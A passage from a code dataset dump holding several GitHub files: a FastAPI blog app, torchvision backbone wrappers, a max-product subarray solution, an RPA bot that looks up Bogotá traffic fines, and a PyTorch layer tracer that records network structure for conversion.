\r\n\t\t\t\t\t\t\tdetail=f'Blog {id} not found.')\r\n\tblog_.update(blog, synchronize_session=False)\r\n\tdb.commit()\r\n\treturn f'Blog {id} updated successfully.'\r\n\r\n# Show all Blogs\r\n\r\n@app.get('/blogs')\r\ndef all(db:Session=Depends(get_db)):\r\n\tblogs = db.query(models.Blog).all()\r\n\treturn blogs\r\n\r\n# Show a particular Blog\r\n@app.get('/blogs/{id}', status_code=200)\r\ndef show(id:int, response:Response, db:Session=Depends(get_db)):\r\n\t# blog = db.query(models.Blog)[id-1]\r\n\tblog = db.query(models.Blog).filter(models.Blog.id == id).first()\r\n\t\r\n\tif not blog:\r\n\t\t#response.status_code = status.HTTP_404_NOT_FOUND\r\n\t\t#return {'detail':f'Blog with ID {id} not found'}\r\n\t\t\r\n\t\traise HTTPException(status_code=status.HTTP_404_NOT_FOUND, \r\n\t\t\t\t\t\t\tdetail=f'Blog with ID {id} not found')\r\n\r\n\t\r\n\treturn blog","repo_name":"suprateembanerjee/debug","sub_path":"blog/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"6445170157","text":"import torch.nn as nn\nfrom torchvision import models as models_2d\n\n\nclass Identity(nn.Module):\n \"\"\"Identity layer to replace last fully connected layer\"\"\"\n\n def forward(self, x):\n return x\n\n\n################################################################################\n# ResNet Family\n################################################################################\n\n\ndef resnet_18(pretrained=True):\n model = models_2d.resnet18(pretrained=pretrained)\n feature_dims = model.fc.in_features\n model.fc = Identity()\n return model, feature_dims, 1024\n\n\ndef resnet_34(pretrained=True):\n model = models_2d.resnet34(pretrained=pretrained)\n feature_dims = model.fc.in_features\n model.fc = Identity()\n return model, feature_dims, 1024\n\n\ndef resnet_50(pretrained=True):\n model = models_2d.resnet50(pretrained=pretrained)\n feature_dims = model.fc.in_features\n model.fc = Identity()\n return model, feature_dims, 1024\n\n\n################################################################################\n# DenseNet Family\n################################################################################\n\n\ndef densenet_121(pretrained=True):\n model = models_2d.densenet121(pretrained=pretrained)\n feature_dims = model.classifier.in_features\n model.classifier = Identity()\n return model, feature_dims, None\n\n\ndef densenet_161(pretrained=True):\n model = models_2d.densenet161(pretrained=pretrained)\n feature_dims = model.classifier.in_features\n model.classifier = Identity()\n return model, feature_dims, None\n\n\ndef densenet_169(pretrained=True):\n model = models_2d.densenet169(pretrained=pretrained)\n feature_dims = model.classifier.in_features\n model.classifier = Identity()\n return model, feature_dims, None\n\n\n################################################################################\n# ResNextNet Family\n################################################################################\n\n\ndef resnext_50(pretrained=True):\n model = models_2d.resnext50_32x4d(pretrained=pretrained)\n feature_dims = model.fc.in_features\n model.fc = Identity()\n return model, feature_dims, None\n\n\ndef resnext_100(pretrained=True):\n model = models_2d.resnext101_32x8d(pretrained=pretrained)\n feature_dims = model.fc.in_features\n model.fc = Identity()\n return model, feature_dims, None\n","repo_name":"marshuang80/gloria","sub_path":"gloria/models/cnn_backbones.py","file_name":"cnn_backbones.py","file_ext":"py","file_size_in_byte":2360,"program_lang":"python","lang":"en","doc_type":"code","stars":105,"dataset":"github-code","pt":"16"}
+{"seq_id":"6551110425","text":"\"\"\"\r\nGiven an integer array nums, find a \r\nsubarray that has the largest product, and return the product.\r\n\"\"\"\r\n\r\ndef maxProduct(self, nums) -> int:\r\n maxi = float('-inf')\r\n pref = 1\r\n suff = 1\r\n for i in range(len(nums)):\r\n if pref == 0 : pref = 1\r\n if suff == 0 : suff = 1\r\n pref *= nums[i]\r\n suff *= nums[len(nums)-i-1]\r\n maxi = max(maxi,pref,suff)\r\n return maxi","repo_name":"AyusDas/dsa","sub_path":"imp_algo/Subarray/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"11548067971","text":"\"\"\"Template robot with Python.\"\"\"\nfrom handlers import process\nfrom service import final_json\nimport json\nfrom RPA.Robocorp.WorkItems import WorkItems\n\nworkitem = WorkItems()\nworkitem.get_input_work_item()\ncomparendo_list = [\"comparendo_type\", \"comparendo_status\", \"id_comparendo\", \"dummy\", \"placa\", \"comparendo_date\", \"comparendo_saldo\", \"comparen_intereses\", \"comparendo_total\", \"comparendo_medium\"]\nurl = \"https://consultas.transitobogota.gov.co:8010/publico/index3.php\"\nplate_number = workitem.get_work_item_variable(\"placa\") #\"BRY010gy\"\ndoc_number = workitem.get_work_item_variable(\"doc_number\")#\"1060634\"\ndoc_type = workitem.get_work_item_variable(\"doc_type\")#\"CE\"\n\n# plate_number = \"BWL600\"\n# doc_number = \"819063\"\n# doc_type = \"CE\"\n\n\n\ndef trafic_ticket():\n try:\n process.open_webpage(url)\n number_of_pages = process.make_search(doc_type, plate_number, doc_number)\n total_comparendo = {}\n final_comparendo = {}\n for j in range(number_of_pages):\n for i in range(50):\n try:\n comparendo_dict = process.scrapr_from_the_initial_table(4+i, comparendo_list)\n if comparendo_dict == \"\":\n break\n else:\n total_comparendo[\"comparendo{0}\".format(i+1)] = comparendo_dict\n except Exception as e:\n raise(e)\n final_comparendo[\"data\"] = total_comparendo\n json_object = json.dumps(final_comparendo, indent=4)\n \n with open(\"./output/schema.json\", \"w\") as outfile:\n outfile.write(json_object)\n workitem.create_output_work_item(variables=final_comparendo, save=True)\n except Exception as e:\n workitem.release_input_work_item(\"FAILED\", \"BUSINESS\", message=e)\n print(\"Done.\")\n\n\nif __name__ == \"__main__\":\n trafic_ticket()\n # captcha_solution = captcha_solver.twocaptcha_solver(\"captcha.png\")\n","repo_name":"Wale17/Traffic-ticket-bot","sub_path":"task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":1934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"23606993558","text":"import os\nimport json\nimport torch\nimport traceback\nfrom torch import nn\nimport numpy as np\nimport torch.nn.functional as F\nfrom .utils import Json, TransLog, LayerOut_id, REGISTERED_LIST, get_weight\nfrom . import config as cfg\n\n\n\n# global params\nlog = TransLog()\nINLINE = False\nPLULINE = False\nDEBUG = cfg.DEBUG\nPARAM_FLAG = True\nJSON_PARAM = {}\nMODULE_DICT = {}\n\n# Tensor operator\nraw__add__ = torch.Tensor.__add__\nraw__sub__ = torch.Tensor.__sub__\nraw__permute__ = torch.Tensor.permute\nraw__expand_as__ = torch.Tensor.expand_as\n\n\nPLUGINS_LIST = [\n \"BasicBlock\",\n \"Hsigmoid\",\n \"Hswish\",\n]\n\n\ndef get_parameters():\n global PARAM_FLAG\n global JSON_PARAM\n\n if PARAM_FLAG:\n js_init = Json(os.path.join(cfg.JSON_FILE_DIR, cfg.MODELNAME, cfg.MODELNAME + \".json\"))\n js_param = js_init.get_json_param()\n JSON_PARAM = js_param\n PARAM_FLAG = False\n return js_param\n\n js_param = JSON_PARAM\n\n return js_param\n\n\n# nn.Conv2d ---> F.conv2d\ndef _conv2d(raw, input, weight, bias=None, stride=1, padding=0, dilation=1, groups=1):\n global INLINE\n x = raw(input, weight, bias, stride, padding, dilation, groups)\n INLINE = True\n name = log.add_layer(name=\"conv2d_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # extract weight to get wgt\n get_weight(weight, f\"{name}.weight\")\n weightKey = f\"{name}\"\n biasKey = f\"{name}\"\n\n # add json params\n if bias is not None:\n get_weight(bias, f\"{name}.bias\")\n biasFile = f\"{name}\"\n\n conv_params = dict(\n {\n \"layerStyle\": \"conv\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"weightKey\": weightKey,\n \"biasKey\": biasKey,\n \"parameter\": {\n \"input_c\": input.shape[1],\n \"output_c\": x.shape[1],\n \"kernel\": [weight.shape[2], weight.shape[3]],\n \"padding\": padding,\n \"stride\": stride,\n \"dilation\": dilation,\n \"groups\": groups,\n },\n }\n )\n\n if DEBUG:\n print(conv_params)\n js_param = get_parameters()\n js_param[\"network\"].append(conv_params)\n INLINE = False\n return x\n\n\n# nn.ReLU ----> F.relu\ndef _relu(raw, input, inplace=False):\n global INLINE\n name = log.add_layer(name=\"relu_\")\n inputName_ = log.blobs(input, name) # 这样防止 x == input时,它们id一致\n x = raw(input, inplace)\n INLINE = True\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # no weight to extract\n # add json params\n relu_params = dict(\n {\n \"layerStyle\": \"active\",\n \"layerName\": name,\n \"inputName\": inputName_,\n \"activeType\": \"relu\",\n }\n )\n if DEBUG:\n print(relu_params)\n js_param = get_parameters()\n js_param[\"network\"].append(relu_params)\n INLINE = False\n return x\n\n\n# nn.leakyReLU ---> F.leakyReLU\ndef _leaky_relu(raw, input, negative_slope=0.01, inplace=False):\n global INLINE\n x = raw(input, negative_slope, inplace)\n INLINE = True\n name = log.add_layer(name=\"leaky_relu_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # no weight to extract\n # add json params\n leaky_relu_params = dict(\n {\"layerStyle\": \"active\", \"layerName\": name, \"inputName\": log.blobs(input, name), \"active_type\": \"l_relu\"}\n )\n\n if DEBUG:\n print(leaky_relu_params)\n js_param = get_parameters()\n js_param[\"network\"].append(leaky_relu_params)\n INLINE = False\n return x\n\n\n# nn,MaxPool2d ---> F.max_pool2d\ndef _max_pool2d(raw, *args, **kwargs):\n global INLINE\n # args = (input, kernel, stride, padding, dilation, ceil_mode, return_indices)\n x = raw(*args, **kwargs)\n INLINE = True\n name = log.add_layer(name=\"max_pool2d_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # no weight to extract\n # add json params\n max_pool2d_params = dict(\n {\n \"layerStyle\": \"pool\",\n \"layerName\": name,\n \"inputName\": log.blobs(args[0], name),\n \"parameter\": {\n \"poolType\": \"kMAX\",\n # \"kernel\": [kernel_size, kernel_size] if isinstance(kernel_size, int) else kernel_size,\n # \"stride\": [stride, stride] if isinstance(stride, int) else stride,\n # \"padding\": [padding, padding] if isinstance(padding, int) else padding,\n \"kernel\": [args[1], args[1]] if isinstance(args[1], int) else args[1],\n \"stride\": [args[2], args[2]] if isinstance(args[2], int) else args[2],\n \"padding\": [args[3], args[3]] if isinstance(args[3], int) else args[3],\n },\n }\n )\n if DEBUG:\n print(max_pool2d_params)\n js_param = get_parameters()\n js_param[\"network\"].append(max_pool2d_params)\n INLINE = False\n return x\n\n\n# nn.AvgPool2d ----> F.avg_pool2d\ndef _avg_pool2d(\n raw,\n input,\n kernel_size,\n stride=None,\n padding=0,\n ceil_mode=False,\n count_include_pad=True,\n divisor_override=None,\n):\n global INLINE\n x = raw(input, kernel_size, stride=None, padding=0, ceil_mode=False, count_include_pad=True, divisor_override=None)\n INLINE = True\n name = log.add_layer(name=\"avg_pool2d_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # no weight to extract\n # add json params\n avg_pool2d_params = dict(\n {\n \"layerStyle\": \"pool\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"parameter\": {\n \"poolType\": \"kAVERAGE\",\n \"kernel\": [kernel_size, kernel_size] if isinstance(kernel_size, int) else kernel_size,\n \"stride\": [stride, stride] if isinstance(stride, int) else stride,\n \"padding\": [padding, padding] if isinstance(padding, int) else padding,\n },\n }\n )\n if DEBUG:\n print(avg_pool2d_params)\n\n js_param = get_parameters()\n js_param[\"network\"].append(avg_pool2d_params)\n INLINE = False\n return x\n\n\n# nn.Linear ---> F.linear\ndef _linear(raw, input, weight, bias=None):\n global INLINE\n x = raw(input, weight, bias)\n INLINE = True\n name = log.add_layer(name=\"linear_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # extract weight\n get_weight(weight, f\"{name}.weight\")\n weightKey = f\"{name}\"\n biasKey = f\"{name}\"\n if bias is not None:\n get_weight(bias, f\"{name}.bias\")\n biasKey = f\"{name}\"\n # add json param\n linear_params = dict(\n {\n \"layerStyle\": \"fc\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"weightKey\": weightKey,\n \"parameter\": {\"input_c\": input.shape[1], \"output_c\": x.shape[1]},\n }\n )\n if bias is not None:\n linear_params[\"biasKey\"] = biasKey\n if DEBUG:\n print(linear_params)\n js_param = get_parameters()\n js_param[\"network\"].append(linear_params)\n INLINE = False\n return x\n\n\n# nn.AdaptiveAvgPool2d ---> F.adaptive_avg_pool2d\n# tensorrt not support, just pytorch test\ndef _adaptive_avg_pool2d(raw, input, output_size):\n global INLINE\n x = raw(input, output_size)\n INLINE = True\n name = log.add_layer(name=\"adaptive_avg_pool2d_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n if isinstance(output_size, int):\n out_size_0 = output_size\n out_size_1 = output_size\n else:\n out_size_0 = output_size[0]\n out_size_1 = output_size[1]\n\n input_sz = np.array(input.shape[2:]) # input_size [H * W]\n output_sz = np.array([out_size_0, out_size_1])\n\n stride_sz = np.floor(input_sz / output_sz)\n kernel_sz = input_sz - (output_sz - 1) * stride_sz\n\n # no weight extract\n # add json params\n adaptive_avg_pool2d_params = dict(\n {\n \"layerStyle\": \"pool\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"parameter\": {\n \"poolType\": \"kAVG\",\n \"kernel\": [int(kernel_sz[0]), int(kernel_sz[1])],\n \"stride\": [int(stride_sz[0]), int(stride_sz[1])],\n \"padding\": [0, 0],\n },\n }\n )\n if DEBUG:\n print(adaptive_avg_pool2d_params)\n js_param = get_parameters()\n js_param[\"network\"].append(adaptive_avg_pool2d_params)\n INLINE = False\n return x\n\n\n# nn.Softmax ---> F.softmax\ndef _softmax(raw, input, dim=None, _stacklevel=3, dtype=None):\n global INLINE\n x = raw(input, dim, _stacklevel, dtype)\n INLINE = True\n name = log.add_layer(name=\"softmax_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # no weight to extract\n # add json params\n softmax_params = dict(\n {\n \"layerStyle\": \"softmax\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n }\n )\n if DEBUG:\n print(softmax_params)\n js_param = get_parameters()\n js_param[\"network\"].append(softmax_params)\n INLINE = False\n return x\n\n\n# ConvTranspose2d ---> F.conv_transpose2d\ndef _conv_transpose2d(raw, input, weight, bias=None, stride=1, padding=0, output_padding=0, groups=1, dilation=1):\n global INLINE\n x = raw(input, weight, bias, stride, padding, output_padding, groups, dilation)\n INLINE = True\n name = log.add_layer(name=\"Deconv2d_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # extract weight\n get_weight(weight, f\"{name}.weight\")\n weightKey = f\"{name}\"\n if bias is not None:\n get_weight(bias, f\"{name}.bias\")\n biasFile = f\"{name}.bias\"\n\n # add json params\n conv_transpose2d_params = dict(\n {\n \"layerStyle\": \"deconv\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"weightKey\": weightKey,\n \"parameter\": {\n \"input_c\": input.shape[1],\n \"output_c\": x.shape[1],\n \"kernel\": [weight.shape[2], weight.shape[3]],\n \"padding\": padding,\n \"stride\": stride,\n },\n }\n )\n if bias is not None:\n conv_transpose2d_params[\"biasFile\"] = biasFile\n if DEBUG:\n print(conv_transpose2d_params)\n\n js_param = get_parameters()\n js_param[\"network\"].append(conv_transpose2d_params)\n return x\n\n\n# ['ConstantPad1d', 'ConstantPad2d', 'ConstantPad3d'] ---> F.pad\ndef _pad(raw, input, pad, mode=\"constant\", value=0):\n global INLINE\n x = raw(input, pad, mode, value)\n INLINE = True\n name = log.add_layer(name=\"pad_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # not weight extract\n # add json params\n pad_params = dict(\n {\n \"layerStyle\": \"padding\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"parameter\": {\n \"input_c\": input.shape[1],\n \"prePadding\": [0, 0],\n \"postPadding\": [1, 1],\n },\n }\n )\n if DEBUG:\n print(pad_params)\n js_param = get_parameters()\n js_param[\"network\"].append(pad_params)\n INLINE = False\n return x\n\n\n# F.interpolate\ndef _interpolate(\n raw, input, size=None, scale_factor=None, mode=\"nearest\", align_corners=None, recompute_scale_factor=None\n):\n global INLINE\n x = raw(input, size, scale_factor, mode, align_corners, recompute_scale_factor)\n INLINE = True\n name = log.add_layer(name=\"interpolate_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # no weight extract\n # add json param\n resizeMode = {\"nearest\": 0, \"bilinear\": 1}\n interpolate_params = dict(\n {\n \"layerStyle\": \"resize\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"resizeMode\": resizeMode[mode],\n \"alignCorners\": align_corners,\n \"resizeDim\": size,\n }\n )\n if DEBUG:\n print(interpolate_params)\n js_param = get_parameters()\n js_param[\"network\"].append(interpolate_params)\n INLINE = False\n return x\n\n\n# nn.BathcNorm --> F.batch_norm\ndef _batch_norm(\n raw, input, weight, bias, running_mean, running_var, training, momentum, eps, torch_backends_cudnn_enabled\n):\n global INLINE\n x = raw(input, weight, bias, running_mean, running_var, training, momentum, eps, torch_backends_cudnn_enabled)\n INLINE = True\n name = log.add_layer(name=\"BN_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # extract weight to get wgt\n get_weight(weight, f\"{name}.weight\")\n get_weight(bias, f\"{name}.bias\")\n get_weight(running_mean, f\"{name}.running_mean\")\n get_weight(running_var, f\"{name}.running_var\")\n\n # add json params\n weightKey = f\"{name}\"\n bn_params = dict(\n {\n \"layerStyle\": \"bn\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"weightKey\": weightKey,\n }\n )\n if DEBUG:\n print(bn_params)\n js_param = get_parameters()\n js_param[\"network\"].append(bn_params)\n INLINE = False\n return x\n\n\n# nn.Sigmoid ---> torch.sigmoid\ndef _sigmoid(raw, input):\n global INLINE\n x = raw(input)\n INLINE = True\n name = log.add_layer(name=\"sigmoid_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # no weiht to extract\n # add json params\n sigmoid_params = dict(\n {\n \"layerstyle\": \"active\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"active_type\": \"sigmoid\",\n }\n )\n if DEBUG:\n print(sigmoid_params)\n js_param = get_parameters()\n js_param[\"network\"].append(sigmoid_params)\n INLINE = False\n return x\n\n\n# torch.flatten\ndef _flatten(raw, input, start_dim=1, end_dim=-1):\n global INLINE\n x = raw(input, start_dim, end_dim)\n INLINE = True\n name = LayerOut_id[int(id(input))]\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n INLINE = False\n return x\n\n\n# torch.cat\ndef _cat(raw, inputs, dim=0):\n global INLINE\n\n x = raw(inputs, dim)\n INLINE = True\n inputName = []\n for input in inputs:\n inputName.append(log.blobs(input, name=\"cat\"))\n\n name = log.add_layer(name=\"cat_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # no weight extract\n # add json params\n cat_params = dict(\n {\n \"layerStyle\": \"concat\",\n \"layerName\": name,\n \"inputName\": inputName,\n \"axis\": dim,\n }\n )\n if DEBUG:\n print(cat_params)\n\n js_param = get_parameters()\n js_param[\"network\"].append(cat_params)\n INLINE = False\n return x\n\n\n# F.instance_norm\ndef _instance_norm(\n raw,\n input,\n weight,\n bias,\n running_mean,\n running_var,\n use_input_stats,\n momentum,\n eps,\n torch_backends_cudnn_enabled,\n):\n global INLINE\n x = raw(\n input, weight, bias, running_mean, running_var, use_input_stats, momentum, eps, torch_backends_cudnn_enabled\n )\n INLINE = True\n name = log.add_layer(name=\"IN_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # extract weight\n get_weight(weight, f\"{name}.weight\")\n get_weight(bias, f\"{name}. bias\")\n\n # add json params\n weightKey = f\"{name}\"\n biasKey = f\"{name}\"\n instance_norm_params = dict(\n {\n \"layerStyle\": \"in\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"weightKey\": weightKey,\n \"biasKey\": biasKey,\n }\n )\n\n if DEBUG:\n print(instance_norm_params)\n\n js_param = get_parameters()\n js_param[\"network\"].append(instance_norm_params)\n INLINE = False\n return x\n\n\n# torch.topk\ndef _topk(raw, input, k, dim=None, largest=True, sorted=True):\n global INLINE\n x = raw(input, k, dim, largest, sorted)\n INLINE = True\n name = log.add_layer(name=\"topk_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # no weight extract\n # add json params\n topk_params = dict(\n {\n \"layerStyle\": \"topk\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"TopKOperation\": \"kMAX\" if largest else \"kMIN\",\n \"k\": k,\n \"reduceAxes\": 1,\n \"outputIndex\": 0,\n }\n )\n if DEBUG:\n print(topk_params)\n js_param = get_parameters()\n js_param[\"network\"].append(topk_params)\n INLINE = False\n return x\n\n\n# torch.argmax\ndef _argmax(raw, input, dim, keepdim=False):\n global INLINE\n x = raw(input, dim, keepdim)\n INLINE = True\n name = log.add_layer(name=\"argmax_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # no weight extract\n # add json params\n argmax_params = dict(\n {\n \"layerStyle\": \"argMax\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"outputName\": \"argMaxTestout\",\n \"parameter\": {\n \"reShape\": [1, 8, 16],\n \"chooseInde\": dim,\n },\n }\n )\n if DEBUG:\n print(argmax_params)\n js_param = get_parameters()\n js_param[\"network\"].append(argmax_params)\n INLINE = False\n return x\n\n\n# torch.div\ndef _div(raw, input, other):\n global INLINE\n x = raw(input, other)\n INLINE = True\n name = log.add_layer(name=\"div_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # add json params\n div_params = dict(\n {\n \"layerStyle\": \"eltwise\",\n \"layerName\": name,\n \"eltType\": \"kDIV\",\n \"inputName\": [log.blobs(input, name), log.blobs(other, name)],\n }\n )\n if DEBUG:\n print(div_params)\n js_param = get_parameters()\n js_param[\"network\"].append(div_params)\n INLINE = False\n return x\n\n\n# torch.split\ndef _split(raw, tensor, split_size_or_sections, dim=0):\n global INLINE\n x = raw(tensor, split_size_or_sections, dim)\n INLINE = True\n name = log.add_layer(name=\"split_\")\n layerName = []\n start = 0\n slicePoint = [\n start,\n ]\n\n for i in range(len(x)):\n layerName.append(name + \"_idx{}\".format(i + 1))\n log.add_blobs([x[i]], name=layerName[-1])\n LayerOut_id[int(id(x[i]))] = layerName[-1]\n start += len(x[i])\n slicePoint.append(start)\n\n split_params = dict(\n {\n \"layerStyle\": \"slice\",\n \"layerName\": layerName,\n \"inputName\": log.blobs(tensor, name),\n \"axis\": dim,\n \"slicePoint\": slicePoint[:-1],\n }\n )\n if DEBUG:\n print(split_params)\n\n js_param = get_parameters()\n js_param[\"network\"].append(split_params)\n INLINE = False\n return x\n\n\n# torch.reshape\ndef _reshape(raw, input, shape):\n global INLINE\n x = raw(input, shape)\n INLINE = True\n name = log.add_layer(name=\"reshape_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # add json params\n reshape_params = dict(\n {\n \"layerStyle\": \"shuffle\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"isReshape\": True,\n \"reshapeFirst\": True,\n \"reshape\": shape,\n }\n )\n if DEBUG:\n print(reshape_params)\n js_param = get_parameters()\n js_param[\"network\"].append(reshape_params)\n INLINE = False\n return x\n\n\n# _add\ndef _add(input, *args):\n\n if isinstance(args[0], float) or isinstance(args[0], int):\n x = raw__add__(input, *args)\n return x\n\n global INLINE\n x = raw__add__(input, *args)\n INLINE = True\n name = log.add_layer(name=\"add_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n add_params = dict(\n {\n \"layerStyle\": \"eltwise\",\n \"layerName\": name,\n \"eltType\": \"kSUM\",\n \"inputName\": {\n \"inputName_1\": log.blobs(input, name),\n \"inputName_2\": log.blobs(args[0], name),\n },\n }\n )\n if DEBUG:\n print(\"__add__\")\n print(add_params)\n js_param = get_parameters()\n js_param[\"network\"].append(add_params)\n INLINE = False\n return x\n\n\n# _sub\ndef _sub(input, *args):\n global INLINE\n x = raw__sub__(input, *args)\n INLINE = True\n name = log.add_layer(name=\"sub_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n sub_params = dict(\n {\n \"layerStyle\": \"eltwise\",\n \"layerName\": name,\n \"eltType\": \"kSUB\",\n \"inputName\": [log.blobs(input, name), log.blobs(args[0], name)],\n }\n )\n\n if DEBUG:\n print(\"__sub__\")\n print(sub_params)\n\n js_param = get_parameters()\n js_param[\"network\"].append(sub_params)\n INLINE = False\n return x\n\n\n# expand_as\ndef _expand_as(input, *args):\n global INLINE\n x = raw__expand_as__(input, *args)\n INLINE = True\n name = log.add_layer(name=\"expand_as_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n expand_as_params = dict(\n {\n \"layerStyle\": \"expand\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"expand_as\": log.blobs(args[0], name),\n }\n )\n\n if DEBUG:\n print(\"__expand_as__\")\n print(expand_as_params)\n\n js_param = get_parameters()\n js_param[\"network\"].append(expand_as_params)\n INLINE = False\n return x\n\n\ndef _Hwsife(input, *agrs):\n pass\n\n\n# _permute\ndef _permute(input, *args):\n global INLINE\n x = raw__permute__(input, *args)\n INLINE = True\n name = log.add_layer(name=\"permute_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n permute_params = dict(\n {\n \"layerStype\": \"shuffle\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"isReshape\": False,\n \"reshapeFirst\": False,\n \"reshape\": None,\n \"isPermute\": True,\n \"permute\": args,\n }\n )\n if DEBUG:\n print(\"__permute__\")\n print(permute_params)\n\n js_param = get_parameters()\n js_param[\"network\"].append(permute_params)\n INLINE = False\n return x\n\n\nclass RegOp(object):\n \"\"\"\n Registration Operator\n \"\"\"\n\n def __init__(self, raw, replace, **kwargs):\n self.obj = replace\n self.raw = raw\n\n def __call__(self, *args, **kwargs):\n global PLULINE\n if INLINE:\n return self.raw(*args, **kwargs)\n\n else:\n\n for stack in traceback.walk_stack(None):\n flag = True\n state_stack = stack[0]\n # 第一层判断\n if \"self\" in state_stack.f_locals:\n module_name = type(state_stack.f_locals[\"self\"]).__name__\n if module_name in PLUGINS_LIST:\n \n module_id = 0\n if isinstance(state_stack.f_locals, dict):\n if \"x\" in state_stack.f_locals.keys():\n module_id = id(state_stack.f_locals[\"x\"])\n if \"input\" in state_stack.f_locals.keys():\n module_id = id(state_stack.f_locals[\"input\"])\n\n if module_name not in MODULE_DICT.keys():\n MODULE_DICT[module_name] = module_id\n # TODO \n print(\"module_name: \", module_name)\n # print(\"module_id: \", module_id)\n break\n\n if module_name in MODULE_DICT.keys():\n if MODULE_DICT[module_name] == module_id:\n break\n else:\n MODULE_DICT[module_name] = module_id\n # TODO\n print(\"module_name: \", module_name)\n print(\"module_id: \", module_id)\n PLULINE = True\n break\n\n # 向上查找\n while flag:\n state_stack = state_stack.f_back\n if state_stack.f_code.co_name == \"_call_impl\":\n flag = False\n\n # 往上一层判断\n state_stack = state_stack.f_back\n if \"self\" in state_stack.f_locals:\n module_name = type(state_stack.f_locals[\"self\"]).__name__\n if module_name in PLUGINS_LIST:\n \n module_id = 0\n if isinstance(state_stack.f_locals, dict):\n if \"x\" in state_stack.f_locals.keys():\n module_id = id(state_stack.f_locals[\"x\"])\n if \"input\" in state_stack.f_locals.keys():\n module_id = id(state_stack.f_locals[\"input\"])\n\n\n if module_name not in MODULE_DICT.keys():\n MODULE_DICT[module_name] = module_id\n # TODO \n print(\"module_name: \", module_name)\n print(\"module_id: \", module_id)\n break\n\n if module_name in MODULE_DICT.keys():\n if MODULE_DICT[module_name] == module_id:\n break\n else:\n MODULE_DICT[module_name] = module_id\n # TODO\n print(\"module_name: \", module_name)\n print(\"module_id: \", module_id)\n PLULINE = True\n break\n break\n\n out = self.obj(self.raw, *args, **kwargs)\n return out\n\n\ndef create_network():\n\n # 创建json param\n get_parameters()\n weight_path = os.path.join(cfg.WEIGHTS_DIR, cfg.MODELNAME, cfg.MODELNAME + \".weights\")\n if os.path.exists(weight_path):\n os.remove(weight_path)\n # 第一行添加多个空格,方便采用 seek,更改参数的个数\n with open(weight_path, \"w\") as file:\n file.write(\"0 \\n\")\n return\n\n\ndef reg_functional_op():\n \"\"\"\n Registration list about all torch.nn.functional support op\n \"\"\"\n F.conv2d = RegOp(F.conv2d, _conv2d)\n F.relu = RegOp(F.relu, _relu)\n F.leaky_relu = RegOp(F.leaky_relu, _leaky_relu)\n F.max_pool2d = RegOp(F.max_pool2d, _max_pool2d)\n F.avg_pool2d = RegOp(F.avg_pool2d, _avg_pool2d)\n F.linear = RegOp(F.linear, _linear)\n F.adaptive_avg_pool2d = RegOp(F.adaptive_avg_pool2d, _adaptive_avg_pool2d)\n F.softmax = RegOp(F.softmax, _softmax)\n F.conv_transpose2d = RegOp(F.conv_transpose2d, _conv_transpose2d)\n F.pad = RegOp(F.pad, _pad)\n F.interpolate = RegOp(F.interpolate, _interpolate)\n\n\ndef reg_torch_op():\n \"\"\"\n Registration list about all torch support op\n \"\"\"\n torch.batch_norm = RegOp(torch.batch_norm, _batch_norm)\n torch.sigmoid = RegOp(torch.sigmoid, _sigmoid)\n torch.flatten = RegOp(torch.flatten, _flatten)\n torch.cat = RegOp(torch.cat, _cat)\n torch.instance_norm = RegOp(torch.instance_norm, _instance_norm)\n torch.topk = 